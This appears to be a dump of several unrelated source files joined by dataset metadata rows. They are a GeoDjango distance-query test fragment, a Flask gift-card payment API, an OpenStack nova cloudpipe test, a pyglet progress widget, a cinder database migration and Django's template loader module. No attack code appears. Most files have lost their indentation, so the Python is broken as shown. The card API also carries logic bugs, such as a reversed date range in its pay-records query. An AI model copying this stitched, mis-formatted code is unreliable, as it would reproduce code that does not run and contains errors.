# We'll be using a Polygon (created by buffering the centroid
# of 77005 to 100m) -- which aren't allowed in geographic distance
# queries normally, however our field has been transformed to
# a non-geographic system.
z = SouthTexasZipcode.objects.get(name='77005')
# Reference query:
# SELECT ST_Distance(ST_Transform("distapp_censuszipcode"."poly", 32140), ST_GeomFromText('<buffer_wkt>', 32140)) FROM "distapp_censuszipcode";
dists_m = [3553.30384972258, 1243.18391525602, 2186.15439472242]
# Having our buffer in the SRID of the transformation and of the field
# -- should get the same results. The first buffer has no need for
# transformation SQL because it is the same SRID as what was given
# to `transform()`. The second buffer will need to be transformed,
# however.
buf1 = z.poly.centroid.buffer(100)
buf2 = buf1.transform(4269, clone=True)
ref_zips = ['77002', '77025', '77401']
for buf in [buf1, buf2]:
qs = CensusZipcode.objects.exclude(name='77005').transform(32140).distance(buf)
self.assertEqual(ref_zips, self.get_names(qs))
for i, z in enumerate(qs):
self.assertAlmostEqual(z.distance.m, dists_m[i], 5)
def test04_distance_lookups(self):
"Testing the `distance_lt`, `distance_gt`, `distance_lte`, and `distance_gte` lookup types."
# Retrieving the cities within a 20km 'donut' w/a 7km radius 'hole'
# (thus, Houston and Southside place will be excluded as tested in
# the `test02_dwithin` above).
qs1 = SouthTexasCity.objects.filter(point__distance_gte=(self.stx_pnt, D(km=7))).filter(point__distance_lte=(self.stx_pnt, D(km=20)))
# Can't determine the units on SpatiaLite from PROJ.4 string, and
# Oracle 11 incorrectly thinks it is not projected.
if spatialite or oracle:
dist_qs = (qs1,)
else:
qs2 = SouthTexasCityFt.objects.filter(point__distance_gte=(self.stx_pnt, D(km=7))).filter(point__distance_lte=(self.stx_pnt, D(km=20)))
dist_qs = (qs1, qs2)
for qs in dist_qs:
cities = self.get_names(qs)
self.assertEqual(cities, ['Bellaire', 'Pearland', 'West University Place'])
# Doing a distance query using Polygons instead of a Point.
z = SouthTexasZipcode.objects.get(name='77005')
qs = SouthTexasZipcode.objects.exclude(name='77005').filter(poly__distance_lte=(z.poly, D(m=275)))
self.assertEqual(['77025', '77401'], self.get_names(qs))
# If we add a little more distance 77002 should be included.
qs = SouthTexasZipcode.objects.exclude(name='77005').filter(poly__distance_lte=(z.poly, D(m=300)))
self.assertEqual(['77002', '77025', '77401'], self.get_names(qs))
def test05_geodetic_distance_lookups(self):
"Testing distance lookups on geodetic coordinate systems."
# Line is from Canberra to Sydney. Query is for all other cities within
# a 100km of that line (which should exclude only Hobart & Adelaide).
line = GEOSGeometry('LINESTRING(144.9630 -37.8143,151.2607 -33.8870)', 4326)
dist_qs = AustraliaCity.objects.filter(point__distance_lte=(line, D(km=100)))
if oracle or connection.ops.geography:
# Oracle and PostGIS 1.5 can do distance lookups on arbitrary geometries.
self.assertEqual(9, dist_qs.count())
self.assertEqual(['Batemans Bay', 'Canberra', 'Hillsdale',
'Melbourne', 'Mittagong', 'Shellharbour',
'Sydney', 'Thirroul', 'Wollongong'],
self.get_names(dist_qs))
else:
# PostGIS 1.4 and below only allows geodetic distance queries (utilizing
# ST_Distance_Sphere/ST_Distance_Spheroid) from Points to PointFields
# on geometry columns.
self.assertRaises(ValueError, dist_qs.count)
# Ensured that a ValueError was raised, none of the rest of the test is
# support on this backend, so bail now.
if spatialite: return
# Too many params (4 in this case) should raise a ValueError.
self.assertRaises(ValueError, len,
AustraliaCity.objects.filter(point__distance_lte=('POINT(5 23)', D(km=100), 'spheroid', '4')))
# Not enough params should raise a ValueError.
self.assertRaises(ValueError, len,
AustraliaCity.objects.filter(point__distance_lte=('POINT(5 23)',)))
# Getting all cities w/in 550 miles of Hobart.
hobart = AustraliaCity.objects.get(name='Hobart')
qs = AustraliaCity.objects.exclude(name='Hobart').filter(point__distance_lte=(hobart.point, D(mi=550)))
cities = self.get_names(qs)
self.assertEqual(cities, ['Batemans Bay', 'Canberra', 'Melbourne'])
# Cities that are either really close or really far from Wollongong --
# and using different units of distance.
wollongong = AustraliaCity.objects.get(name='Wollongong')
d1, d2 = D(yd=19500), D(nm=400) # Yards (~17km) & Nautical miles.
        # Normal geodetic distance lookup (uses `distance_sphere` on PostGIS).
gq1 = Q(point__distance_lte=(wollongong.point, d1))
gq2 = Q(point__distance_gte=(wollongong.point, d2))
qs1 = AustraliaCity.objects.exclude(name='Wollongong').filter(gq1 | gq2)
# Geodetic distance lookup but telling GeoDjango to use `distance_spheroid`
# instead (we should get the same results b/c accuracy variance won't matter
# in this test case).
if postgis:
gq3 = Q(point__distance_lte=(wollongong.point, d1, 'spheroid'))
gq4 = Q(point__distance_gte=(wollongong.point, d2, 'spheroid'))
qs2 = AustraliaCity.objects.exclude(name='Wollongong').filter(gq3 | gq4)
querysets = [qs1, qs2]
else:
querysets = [qs1]
for qs in querysets:
cities = self.get_names(qs)
self.assertEqual(cities, ['Adelaide', 'Hobart', 'Shellharbour', 'Thirroul'])
def test06_area(self):
"Testing the `area` GeoQuerySet method."
# Reference queries:
# SELECT ST_Area(poly) FROM distapp_southtexaszipcode;
area_sq_m = [5437908.90234375, 10183031.4389648, 11254471.0073242, 9881708.91772461]
# Tolerance has to be lower for Oracle and differences
# with GEOS 3.0.0RC4
tol = 2
for i, z in enumerate(SouthTexasZipcode.objects.area()):
self.assertAlmostEqual(area_sq_m[i], z.area.sq_m, tol)
def test07_length(self):
"Testing the `length` GeoQuerySet method."
# Reference query (should use `length_spheroid`).
# SELECT ST_length_spheroid(ST_GeomFromText('<wkt>', 4326) 'SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]]');
len_m1 = 473504.769553813
len_m2 = 4617.668
if spatialite:
# Does not support geodetic coordinate systems.
self.assertRaises(ValueError, Interstate.objects.length)
else:
qs = Interstate.objects.length()
if oracle: tol = 2
else: tol = 5
self.assertAlmostEqual(len_m1, qs[0].length.m, tol)
# Now doing length on a projected coordinate system.
i10 = SouthTexasInterstate.objects.length().get(name='I-10')
self.assertAlmostEqual(len_m2, i10.length.m, 2)
@no_spatialite
def test08_perimeter(self):
"Testing the `perimeter` GeoQuerySet method."
# Reference query:
# SELECT ST_Perimeter(distapp_southtexaszipcode.poly) FROM distapp_southtexaszipcode;
perim_m = [18404.3550889361, 15627.2108551001, 20632.5588368978, 17094.5996143697]
if oracle: tol = 2
else: tol = 7
for i, z in enumerate(SouthTexasZipcode.objects.perimeter()):
self.assertAlmostEqual(perim_m[i], z.perimeter.m, tol)
# Running on points; should return 0.
for i, c in enumerate(SouthTexasCity.objects.perimeter(model_att='perim')):
self.assertEqual(0, c.perim.m)
def test09_measurement_null_fields(self):
"Testing the measurement GeoQuerySet methods on fields with NULL values."
# Creating SouthTexasZipcode w/NULL value.
SouthTexasZipcode.objects.create(name='78212')
# Performing distance/area queries against the NULL PolygonField,
# and ensuring the result of the operations is None.
htown = SouthTexasCity.objects.get(name='Downtown Houston')
z = SouthTexasZipcode.objects.distance(htown.point).area().get(name='78212')
self.assertEqual(None, z.distance)
self.assertEqual(None, z.area)
| bsd-3-clause | -1,692,011,365,034,976,300 | -137,739,755,328,607,280 | 52.215084 | 196 | 0.63624 | false |
davidvon/pipa-pay-server | admin/api/cards.py | 1 | 18567 | # -*- coding: utf-8 -*-
import datetime
import time
import traceback
from flask import request
from flask.ext.restful import Resource
from api import API_PREFIX
from api.order import create_order
from app import restful_api, db, logger
from cache.order import cache_qrcode_code, get_cache_order
from cache.weixin import get_cache_customer_cards, cache_customer_cards
from models import Customer, CustomerCard, CustomerTradeRecords, CustomerCardShare, Order
from utils.util import nonce_str
from wexin.helper import WeixinHelper
from wexin_pay.views import payable
__author__ = 'fengguanhua'
class ApiCardMembers(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardMembers] in: args[%s]' % args)
openid = args.get("openid")
share = args.get("share")
cards = get_cache_customer_cards(openid)
if not cards:
customer_cards = CustomerCard.query.filter(CustomerCard.customer_id == openid) \
.order_by(CustomerCard.status.asc()).all()
cards = [
{'globalId': item.id,
'cardId': item.card_id,
'merchantId': item.card.merchant.id,
'cardCode': item.card_code,
'amount': item.amount,
'title': item.card.title,
'logo': item.card.merchant.logo,
'img': item.img or 'http://wx.cdn.pipapay.com/static/images/card_blue.png',
'status': item.status,
'expireDate': str(item.expire_date)} for item in customer_cards]
cache_customer_cards(openid, cards)
data = [card for card in cards if card['status'] < 3] if share else cards
logger.debug('[ApiCardMembers] out: result[0], data[%s]' % data)
return {"result": 0, "data": data}
class ApiCardDispatch(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardDispatch] in: args[%s]' % args)
order_id = args.get('order_id')
try:
order = Order.query.filter_by(order_id=order_id).first()
if not order:
logger.warn('[ApiCardDispatch] order[%s] not exist' % order_id)
return {"result": 254}
expire_date = datetime.date.today() + datetime.timedelta(365 * 3) # TODO
count = CustomerCard.query.filter_by(order_id=order_id).count()
if count < order.card_count:
for i in range(count, order.card_count):
card = CustomerCard(customer_id=order.customer.openid, order_id=order_id, card_id=order.card_id,
amount=order.face_amount, expire_date=expire_date, status=0)
db.session.add(card)
db.session.commit()
output = {"result": 0, "data": {"count": order.card_count, "amount": order.face_amount}}
logger.debug('[ApiCardDispatch] out: return [%s]' % output)
return output
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardDispatch] order[%s] card dispatch exception:[%s]' % (order_id, e.message))
return {'result': 255, 'data': e.message}
class ApiWxCardStatusUpdate(Resource):
def post(self):
openid = args = None
try:
args = request.values
logger.debug('[ApiWxCardStatusUpdate] in: args[%s]' % args)
openid = args['openid']
card_global_id = args['cardGlobalId']
card = CustomerCard.query.get(card_global_id)
card.status = 1
db.session.add(card)
db.session.commit()
logger.info('[ApiWxCardStatusUpdate] customer[%s] arg[%s] card[code:%s] status update success' %
(openid, args, card.card_code))
return {'result': 0, 'data': card.card_code}
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiWxCardStatusUpdate] customer[%s] arg[%s] card status update error:[%s]' %
(openid, args, e.message))
return {'result': 255, 'data': e.message}
class ApiCardPayCode(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardPayCode] in: args[%s]' % args)
card_id = args['cardId']
card_code = args['cardCode']
card = CustomerCard.query.filter_by(card_id=card_id, card_code=card_code).first()
if not card:
logger.warn('[ApiCardPayCode] card[id:%s,code:%s] not exist' % (card_id, card_code))
return {'result': 255}
data = {
'status': card.status,
'merchantName': card.card.merchant.name,
'cardName': card.card.title,
'amount': card.amount,
'qrcode': cache_qrcode_code(card_id, card_code)
}
logger.debug('[ApiCardPayCode] out: result[0] data[%s]' % data)
return {'result': 0, 'data': data}
class ApiCardPayRecords(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardPayRecords] in: args[%s]' % args)
card_id = args['cardId']
left = datetime.date.today()
right = datetime.date.today() - datetime.timedelta(30)
records = CustomerTradeRecords.query.filter(CustomerTradeRecords.card_id == card_id,
CustomerTradeRecords.time.between(left, right)).all()
recharge_total = 0
expend_total = 0
for item in records:
if item.type == 0:
recharge_total += item.amount
else:
expend_total += item.amount
data = {
'rechargeTotal': recharge_total,
'expendTotal': expend_total,
'records': [{'merchantName': item.card.merchant.name,
'date': str(item.time),
'amount': item.amount} for item in records]
}
logger.debug('[ApiCardPayRecords] out: result[0] data[%s]' % args)
return {'result': 0, 'data': data}
class ApiCardShareCheck(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShareCheck] in: args[%s]' % args)
card_id = args['cardId']
open_id = args['openId']
card_code = args['cardCode']
if not card_code:
logger.warn('[ApiCardShareCheck] openid:%s card[id:%s] not banding' % (open_id, card_id))
return {'result': 254}
customer_card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=card_code).first()
if not customer_card:
logger.warn('[ApiCardShareCheck] openid:%s card[id:%s code:%s] not exist' % (open_id, card_id, card_code))
return {'result': 255}
if customer_card.status >= 3:
logger.debug('[ApiCardShareCheck] out: result[0] status[%s]' % customer_card.status)
            return {'result': 0, 'status': customer_card.status}  # card is in transfer or already transferred
data = {'result': 0,
'status': customer_card.status,
'card': {
'sign': nonce_str(12),
'cardId': customer_card.card_id,
'cardCode': customer_card.card_code,
'cardName': customer_card.card.title,
'timestamp': str(int(time.time())),
'logo': customer_card.card.merchant.logo}
}
logger.debug('[ApiCardShareCheck] out: return[%s]' % data)
return data
class ApiCardShare(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShare] in: args[%s]' % args)
open_id = args['openId']
card_id = args['cardId']
card_code = args['cardCode']
sign = args['sign']
timestamp = args['timestamp']
content = args['content']
try:
card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=card_code).first()
            card.status = 4  # update card record status to 4: in transfer
record = CustomerCardShare(share_customer_id=open_id, customer_card_id=card.id,
timestamp=timestamp, content=content, sign=sign, status=0)
db.session.add(card)
db.session.add(record)
db.session.commit()
logger.info('[ApiCardShare] customer[%s] result[0] card[%s] share ok' % (open_id, card_id))
return {'result': 0}
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardShare] customer[%s] card[%s] share error:%s' % (open_id, card_id, e.message))
return {'result': 255, 'data': e.message}
class ApiCardShareInfo(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShareInfo] in: args[%s]' % args)
open_id = args['openId']
card_id = args['cardId']
card_code = args['cardCode']
card = CustomerCard.query.filter_by(card_id=card_id, card_code=card_code).first()
if not card:
logger.warn('[ApiCardShareInfo] openid:%s card[id:%s code:%s] not exist' % (open_id, card_id, card_code))
return {'result': 254}
share = CustomerCardShare.query.filter_by(share_customer_id=open_id, customer_card_id=card.id).first()
acquire_customer = None
if share and share.acquire_customer_id:
acquire_customer = Customer.query.filter_by(openid=share.acquire_customer_id).first()
data = {'result': 0,
                'data': {'status': '已领取' if share.status == 2 else '未领取',  # "received" / "not received"
'cardLogo': share.customer_card.card.merchant.logo,
'cardCode': card_code,
'cardName': share.customer_card.card.title,
'datetime': str(share.datetime),
'content': share.content,
'acquireUserImg': acquire_customer.head_image if acquire_customer else '',
'acquireUserName': acquire_customer.show_name() if acquire_customer else '',
}
}
logger.debug('[ApiCardShareInfo] out: return[%s]' % data)
return data
class ApiCardReceiveCheck(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardReceiveCheck] in: args[%s]' % args)
sign = args['sign']
info = CustomerCardShare.query.filter_by(sign=sign).first()
if not info:
logger.warn('[ApiCardReceiveCheck] sign[%s] not exist' % sign)
            return {'result': 255}  # sign does not exist
card = info.customer_card
data = {'result': 0,
'data': {
'giveUserHeadImg': info.share_customer.head_image,
'giveUsername': info.share_customer.show_name(),
'shareContent': info.content,
'cardStatus': card.status,
'giveStatus': info.status,
'acquireUserOpenId': info.acquire_customer_id}
}
logger.debug('[ApiCardReceiveCheck] out: return[%s]' % data)
return data
class ApiCardReceive(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardReceive] in: args[%s]' % args)
sign = args['sign']
openid = args['openId']
need_commit = False
try:
info = CustomerCardShare.query.filter_by(sign=sign).first()
if not info:
logger.error('[ApiCardReceive] customer[%s] card[%s] not sharing' %
(openid, info.customer_card.card_code))
                return {'result': 255}  # sign does not exist
new_card = CustomerCard.query.filter_by(customer_id=openid, card_code=info.customer_card.card_code,
card_id=info.customer_card.card_id).first()
if new_card:
if info.share_customer.openid == openid:
new_card.status = 0
db.session.add(new_card)
need_commit = True
else:
logger.info('[ApiCardReceive] customer[%s] card[%s] not exist' % (openid, info.customer_card_id))
old_card = CustomerCard.query.filter_by(customer_id=info.share_customer.openid,
card_id=info.customer_card.card_id,
card_code=info.customer_card.card_code).first()
new_card = CustomerCard(customer_id=openid, card_id=info.customer_card.card_id, img=old_card.img,
amount=old_card.amount, card_code=old_card.card_code,
expire_date=old_card.expire_date, status=0)
old_card.status = 5
db.session.add(old_card)
db.session.add(new_card)
need_commit = True
if info.status != 1:
info.acquire_customer_id = openid
info.status = 1
db.session.add(info)
need_commit = True
if need_commit:
db.session.commit()
logger.info('[ApiCardReceive] customer[%s] card[%s] received success' % (openid, new_card.card_code))
data = {'result': 0,
'data': {
'status': new_card.status,
"cardGlobalId": new_card.id,
                        'wxCardId': new_card.card.wx_card_id,  # WeChat card coupon ID; can be fetched via chooseCard
                        'code': info.customer_card.card_code  # the designated coupon code; can only be claimed once.
                        # Must be supplied for coupons whose use_custom_code field is true;
                        # not required for non-custom codes.
}}
logger.debug('[ApiCardReceive] out: return[%s]' % data)
return data
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardReceive] customer[%s] receive card[%s] error:%s' % (openid, sign, e.message))
return {'result': 255, 'data': e.message}
class ApiCardBuy(Resource):
def post(self):
try:
args = request.values
logger.info('[ApiCardBuy] args:%s' % args)
card_id = args.get('cardId')
price = args.get('price')
count = args.get('count')
openid = args.get('openId')
order = create_order(card_id, float(price), openid, count)
if not order:
return {'result': 250}
res, outputs = payable(request, openid, order)
logger.info('[ApiCardBuy] data:%s' % str(outputs))
if res == 0:
outputs['orderId'] = order.order_id
logger.info('[ApiCardBuy] create temp order success:%s' % order.order_id)
return {'result': 0, 'content': outputs}
logger.warn('[ApiCardBuy] order:%s pre-pay failed:%d' % (order.order_id, res))
return {'result': res, 'msg': outputs}
except Exception as e:
logger.error('[ApiCardBuy] except:%s' % e.message)
return {'result': 254, 'msg': e.message}
class ApiCardBuyCommit(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardBuyCommit] in: args[%s]' % args)
order_id = args.get('orderId')
order = get_cache_order(order_id)
if not order:
logger.warn('[ApiCardBuyCommit] order:%s not exist' % order_id)
return {'result': 254}
try:
order.paid = True
db.session.add(order)
db.session.commit()
logger.info('[ApiCardBuyCommit] order:%s create success' % order_id)
return {'result': 0}
except Exception as e:
logger.error('[ApiCardBuyCommit] order:%s create error:%s' % (order_id, e.message))
return {'result': 255}
class ApiCardActive(Resource):
def post(self):
open_id = card_id = code = None
args = request.values
logger.debug('[ApiCardActive] in: args[%s]' % args)
try:
card_id = args.get('card_id')
encrypt_code = args.get('encrypt_code')
open_id = args.get('openid')
logger.info('[ApiCardActive] data=%s' % str(args))
helper = WeixinHelper()
code = helper.decrypt_card_code(encrypt_code)
if not code:
logger.error('[ApiCardActive] decrypt card code[%s,%s] error' % (open_id, card_id))
return {'result': 255}
card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=code).first()
active = helper.active_card(card.amount * 100, code, card_id, 0)
if not active:
logger.error('[ApiCardActive] active card[%s,%s,%s] error' % (open_id, card_id, code))
return {'result': 255}
card.status = 2
db.session.add(card)
db.session.commit()
logger.debug('[ApiCardActive] out: result[0]')
return {'result': 0}
except Exception as e:
logger.error('[ApiCardActive] active card[%s,%s,%s] exception:%s' % (open_id, card_id, code, e.message))
return {'result': 255}
restful_api.add_resource(ApiCardBuy, API_PREFIX + 'card/buy')
restful_api.add_resource(ApiCardBuyCommit, API_PREFIX + 'card/buy/commit')
restful_api.add_resource(ApiCardActive, API_PREFIX + 'card/active')
restful_api.add_resource(ApiCardMembers, API_PREFIX + 'cards')
restful_api.add_resource(ApiCardDispatch, API_PREFIX + 'card/dispatch')
restful_api.add_resource(ApiWxCardStatusUpdate, API_PREFIX + 'card/add/status/update')
restful_api.add_resource(ApiCardPayCode, API_PREFIX + 'card/pay/code')
restful_api.add_resource(ApiCardPayRecords, API_PREFIX + 'card/pay/records')
restful_api.add_resource(ApiCardShareCheck, API_PREFIX + 'card/share/check')
restful_api.add_resource(ApiCardShare, API_PREFIX + 'card/share')
restful_api.add_resource(ApiCardShareInfo, API_PREFIX + 'card/share/info')
restful_api.add_resource(ApiCardReceiveCheck, API_PREFIX + 'card/receive/check')
restful_api.add_resource(ApiCardReceive, API_PREFIX + 'card/receive')
| apache-2.0 | -2,127,617,221,530,204,200 | 5,294,499,378,136,740,000 | 41.844186 | 119 | 0.558975 | false |
ntt-sic/nova | nova/tests/api/openstack/compute/contrib/test_cloudpipe_update.py | 27 | 2817 | # Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack.compute.contrib import cloudpipe_update
from nova import db
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_network
fake_networks = [fake_network.fake_network(1),
fake_network.fake_network(2)]
def fake_project_get_networks(context, project_id, associate=True):
return fake_networks
def fake_network_update(context, network_id, values):
for network in fake_networks:
if network['id'] == network_id:
for key in values:
network[key] = values[key]
class CloudpipeUpdateTest(test.NoDBTestCase):
def setUp(self):
super(CloudpipeUpdateTest, self).setUp()
self.controller = cloudpipe_update.CloudpipeUpdateController()
self.stubs.Set(db, "project_get_networks", fake_project_get_networks)
self.stubs.Set(db, "network_update", fake_network_update)
def test_cloudpipe_configure_project(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-project')
body = {"configure_project": {"vpn_ip": "1.2.3.4", "vpn_port": 222}}
result = self.controller.update(req, 'configure-project',
body=body)
self.assertEqual('202 Accepted', result.status)
self.assertEqual(fake_networks[0]['vpn_public_address'], "1.2.3.4")
self.assertEqual(fake_networks[0]['vpn_public_port'], 222)
def test_cloudpipe_configure_project_bad_url(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-projectx')
body = {"vpn_ip": "1.2.3.4", "vpn_port": 222}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req,
'configure-projectx', body)
def test_cloudpipe_configure_project_bad_data(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-project')
body = {"vpn_ipxx": "1.2.3.4", "vpn_port": 222}
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.update, req,
'configure-project', body)
| apache-2.0 | 6,550,269,951,439,406,000 | -2,445,848,965,296,620,000 | 38.676056 | 78 | 0.647142 | false |
shadowmint/nwidget | lib/pyglet-1.4.4/contrib/wydget/wydget/widgets/progress.py | 29 | 1570 | from pyglet.gl import *
from wydget import loadxml
from wydget import util
from wydget.widgets.label import Label
class Progress(Label):
name = 'progress'
def __init__(self, parent, value=0.0, show_value=True,
bar_color='gray', bgcolor=(.3, .3, .3, 1), color='white',
width=None, height=16, halign='center', valign='center', **kw):
self._value = util.parse_value(value, 0)
self.show_value = show_value
self.bar_color = util.parse_color(bar_color)
super(Progress, self).__init__(parent, ' ', width=width,
height=height, bgcolor=bgcolor, color=color, halign=halign,
valign=valign, **kw)
if self.show_value:
            self.text = '%d%%' % (self._value * 100)
def set_value(self, value):
self._value = value
if self.show_value:
self.text = '%d%%'%(value * 100)
value = property(lambda self: self._value, set_value)
def renderBackground(self, rect):
super(Progress, self).renderBackground(rect)
r = rect.copy()
r.width *= self._value
b, self.bgcolor = self.bgcolor, self.bar_color
super(Progress, self).renderBackground(r)
self.bgcolor = b
@classmethod
def fromXML(cls, element, parent):
'''Create the object from the XML element and attach it to the parent.
'''
kw = loadxml.parseAttributes(element)
obj = cls(parent, **kw)
for child in element.getchildren():
loadxml.getConstructor(element.tag)(child, obj)
return obj
| apache-2.0 | -2,150,669,492,540,313,900 | -877,277,776,009,679,200 | 32.404255 | 78 | 0.598726 | false |
winndows/cinder | cinder/db/sqlalchemy/migrate_repo/versions/034_volume_type_add_desc_column.py | 31 | 1274 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, MetaData, Table, String
def upgrade(migrate_engine):
"""Add description column to volume_types."""
meta = MetaData()
meta.bind = migrate_engine
volume_types = Table('volume_types', meta, autoload=True)
description = Column('description', String(255))
volume_types.create_column(description)
volume_types.update().values(description=None).execute()
def downgrade(migrate_engine):
"""Remove description column to volumes."""
meta = MetaData()
meta.bind = migrate_engine
volume_types = Table('volume_types', meta, autoload=True)
description = volume_types.columns.description
volume_types.drop_column(description)
| apache-2.0 | 5,347,915,970,605,109,000 | -7,411,560,095,863,496,000 | 35.4 | 78 | 0.717425 | false |
faun/django_test | build/lib/django/template/loader.py | 16 | 8033 | # Wrapper for loading templates from storage of some sort (e.g. filesystem, database).
#
# This uses the TEMPLATE_LOADERS setting, which is a list of loaders to use.
# Each loader is expected to have this interface:
#
# callable(name, dirs=[])
#
# name is the template name.
# dirs is an optional list of directories to search instead of TEMPLATE_DIRS.
#
# The loader should return a tuple of (template_source, path). The path returned
# might be shown to the user for debugging purposes, so it should identify where
# the template was loaded from.
#
# A loader may return an already-compiled template instead of the actual
# template source. In that case the path returned should be None, since the
# path information is associated with the template during the compilation,
# which has already been done.
#
# Each loader should have an "is_usable" attribute set. This is a boolean that
# specifies whether the loader can be used in this Python installation. Each
# loader is responsible for setting this when it's initialized.
#
# For example, the eggs loader (which is capable of loading templates from
# Python eggs) sets is_usable to False if the "pkg_resources" module isn't
# installed, because pkg_resources is necessary to read eggs.
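#
# As an illustration only (this class is not part of Django), a minimal loader
# implementing the interface described above could look like the sketch below;
# the template source it returns is a placeholder:
#
#     class DummyLoader(BaseLoader):
#         is_usable = True
#
#         def load_template_source(self, template_name, template_dirs=None):
#             if template_name == 'hello.html':
#                 return ('Hello, {{ name }}!', 'dummy:hello.html')
#             raise TemplateDoesNotExist(template_name)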
from django.core.exceptions import ImproperlyConfigured
from django.template import Origin, Template, Context, TemplateDoesNotExist, add_to_builtins
from django.utils.importlib import import_module
from django.conf import settings
template_source_loaders = None
class BaseLoader(object):
is_usable = False
def __init__(self, *args, **kwargs):
pass
def __call__(self, template_name, template_dirs=None):
return self.load_template(template_name, template_dirs)
def load_template(self, template_name, template_dirs=None):
source, display_name = self.load_template_source(template_name, template_dirs)
origin = make_origin(display_name, self.load_template_source, template_name, template_dirs)
try:
template = get_template_from_string(source, origin, template_name)
return template, None
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist, back off to
# returning the source and display name for the template we were asked to load.
# This allows for correct identification (later) of the actual template that does
# not exist.
return source, display_name
def load_template_source(self, template_name, template_dirs=None):
"""
Returns a tuple containing the source and origin for the given template
name.
"""
raise NotImplementedError
def reset(self):
"""
Resets any state maintained by the loader instance (e.g., cached
templates or cached loader modules).
"""
pass
class LoaderOrigin(Origin):
def __init__(self, display_name, loader, name, dirs):
super(LoaderOrigin, self).__init__(display_name)
self.loader, self.loadname, self.dirs = loader, name, dirs
def reload(self):
return self.loader(self.loadname, self.dirs)[0]
def make_origin(display_name, loader, name, dirs):
if settings.TEMPLATE_DEBUG and display_name:
return LoaderOrigin(display_name, loader, name, dirs)
else:
return None
def find_template_loader(loader):
if isinstance(loader, (tuple, list)):
loader, args = loader[0], loader[1:]
else:
args = []
if isinstance(loader, basestring):
module, attr = loader.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
try:
TemplateLoader = getattr(mod, attr)
except AttributeError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
if hasattr(TemplateLoader, 'load_template_source'):
func = TemplateLoader(*args)
else:
# Try loading module the old way - string is full path to callable
if args:
raise ImproperlyConfigured("Error importing template source loader %s - can't pass arguments to function-based loader." % loader)
func = TemplateLoader
if not func.is_usable:
import warnings
warnings.warn("Your TEMPLATE_LOADERS setting includes %r, but your Python installation doesn't support that type of template loading. Consider removing that line from TEMPLATE_LOADERS." % loader)
return None
else:
return func
else:
raise ImproperlyConfigured('Loader does not define a "load_template" callable template source loader')
def find_template(name, dirs=None):
# Calculate template_source_loaders the first time the function is executed
# because putting this logic in the module-level namespace may cause
# circular import errors. See Django ticket #1292.
global template_source_loaders
if template_source_loaders is None:
loaders = []
for loader_name in settings.TEMPLATE_LOADERS:
loader = find_template_loader(loader_name)
if loader is not None:
loaders.append(loader)
template_source_loaders = tuple(loaders)
for loader in template_source_loaders:
try:
source, display_name = loader(name, dirs)
return (source, make_origin(display_name, loader, name, dirs))
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(name)
def find_template_source(name, dirs=None):
# For backward compatibility
import warnings
warnings.warn(
"`django.template.loaders.find_template_source` is deprecated; use `django.template.loaders.find_template` instead.",
DeprecationWarning
)
template, origin = find_template(name, dirs)
if hasattr(template, 'render'):
raise Exception("Found a compiled template that is incompatible with the deprecated `django.template.loaders.find_template_source` function.")
return template, origin
def get_template(template_name):
"""
Returns a compiled Template object for the given template name,
handling template inheritance recursively.
"""
template, origin = find_template(template_name)
if not hasattr(template, 'render'):
# template needs to be compiled
template = get_template_from_string(template, origin, template_name)
return template
def get_template_from_string(source, origin=None, name=None):
"""
Returns a compiled Template object for the given template code,
handling template inheritance recursively.
"""
return Template(source, origin, name)
def render_to_string(template_name, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders it with the given dictionary as
context. The template_name may be a string to load a single template using
get_template, or it may be a tuple to use select_template to find one of
the templates in the list. Returns a string.
"""
dictionary = dictionary or {}
if isinstance(template_name, (list, tuple)):
t = select_template(template_name)
else:
t = get_template(template_name)
if context_instance:
context_instance.update(dictionary)
else:
context_instance = Context(dictionary)
return t.render(context_instance)
def select_template(template_name_list):
"Given a list of template names, returns the first that can be loaded."
for template_name in template_name_list:
try:
return get_template(template_name)
except TemplateDoesNotExist:
continue
# If we get here, none of the templates could be loaded
raise TemplateDoesNotExist(', '.join(template_name_list))
